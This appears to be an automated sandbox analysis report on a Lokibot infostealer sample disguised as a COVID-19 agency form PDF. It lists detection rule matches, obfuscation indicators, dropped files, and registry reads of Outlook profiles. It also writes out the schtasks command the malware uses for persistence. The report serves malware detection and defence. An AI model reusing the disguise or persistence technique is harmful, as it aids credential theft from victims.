                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,6_2_0040434D
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Roaming\qvDFOnW.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\jwmgAWN
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: unknownProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic file information: File size 1109504 > 1048576
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                .NET source code contains method to dynamically call methods (often used by packers)
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Yara detected aPLib compressed binary
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_002D8EC7 push es; retn 0000h0_2_002D8ECA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8C148 push cs; ret 0_2_00B8C156
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8B42A push es; ret 0_2_00B8B42E
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B89F93 push es; ret 0_2_00B89F97
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DE7 push eax; iretd 0_2_04CF6DF2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DFF push ecx; iretd 0_2_04CF6E06
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DF3 push ebx; iretd 0_2_04CF6DFA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EDF push ebx; iretd 0_2_04CF6EE6
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E8F push edi; iretd 0_2_04CF6E92
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E93 push edx; iretd 0_2_04CF6E96
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAF push edi; iretd 0_2_04CF6EB2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAB push ebp; iretd 0_2_04CF6EAE
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EB3 pushad ; iretd 0_2_04CF6EBA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E6F pushad ; iretd 0_2_04CF6E72
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E0F push edx; iretd 0_2_04CF6E16
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E3F push ebp; iretd 0_2_04CF6E42
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E37 push edi; iretd 0_2_04CF6E3A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF5634 push cs; retf 0_2_04CF5635
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E33 push edi; iretd 0_2_04CF6E36
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FEB push edx; iretd 0_2_04CF6FF2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FE7 push esp; iretd 0_2_04CF6FEA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F8F push ds; iretd 0_2_04CF6F9A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F9B push eax; iretd 0_2_04CF6F9E
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FAB push ebp; iretd 0_2_04CF6FB2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F53 push ebx; iretd 0_2_04CF6F56
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F6F push ebp; iretd 0_2_04CF6F72
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F07 push edx; iretd 0_2_04CF6F0A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F17 push edi; iretd 0_2_04CF6F1A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F2F push ecx; iretd 0_2_04CF6F32
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F27 push esp; iretd 0_2_04CF6F2A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F3B push eax; iretd 0_2_04CF6F3E
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: qvDFOnW.exe.0.dr, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: qvDFOnW.exe.0.dr, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: qvDFOnW.exe.0.dr, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: qvDFOnW.exe.0.dr, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
